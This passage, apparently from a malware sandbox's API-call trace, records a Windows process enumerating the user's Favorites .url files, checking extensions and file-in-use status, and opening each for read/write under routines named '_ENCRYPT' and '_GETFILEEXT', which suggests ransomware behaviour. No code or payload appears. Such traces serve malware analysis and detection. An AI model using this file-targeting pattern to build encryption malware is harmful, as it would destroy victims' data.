lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.716] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.716] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.716] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.716] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.716] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0x90add8 [0180.718] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.718] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.718] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0x90add8 [0180.719] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.719] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.719] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.719] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.719] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.719] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.719] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.719] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.721] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.722] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.722] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.722] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.722] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.722] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.723] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.723] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.723] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.723] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.723] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.723] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.723] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.724] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 0x90add8 [0180.725] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.725] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 0x90add8 [0180.726] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.726] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.726] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.726] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.726] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.726] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.726] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.726] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.726] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.726] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.726] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.727] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.729] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.729] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.729] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.729] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.729] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.729] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.729] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.729] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.729] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.729] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.729] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.729] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.730] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.730] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.730] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 0x90add8 [0180.731] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.731] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.731] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 0x90add8 [0180.732] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.732] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.732] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.732] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.732] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.732] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.732] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.732] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.732] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.732] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.732] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.733] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.735] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.735] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.735] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.735] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.735] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.735] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.735] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.735] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.735] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.735] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.735] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.735] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.736] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.736] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.736] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.736] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 0x90add8 [0180.737] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.737] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.737] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 0x90add8 [0180.738] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.738] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.738] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.738] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.738] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.738] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.738] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.738] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.738] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.739] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.742] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.742] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.742] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.742] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.742] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.742] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.743] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.743] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.743] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.743] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.743] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.743] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.743] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.743] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.743] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.743] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, 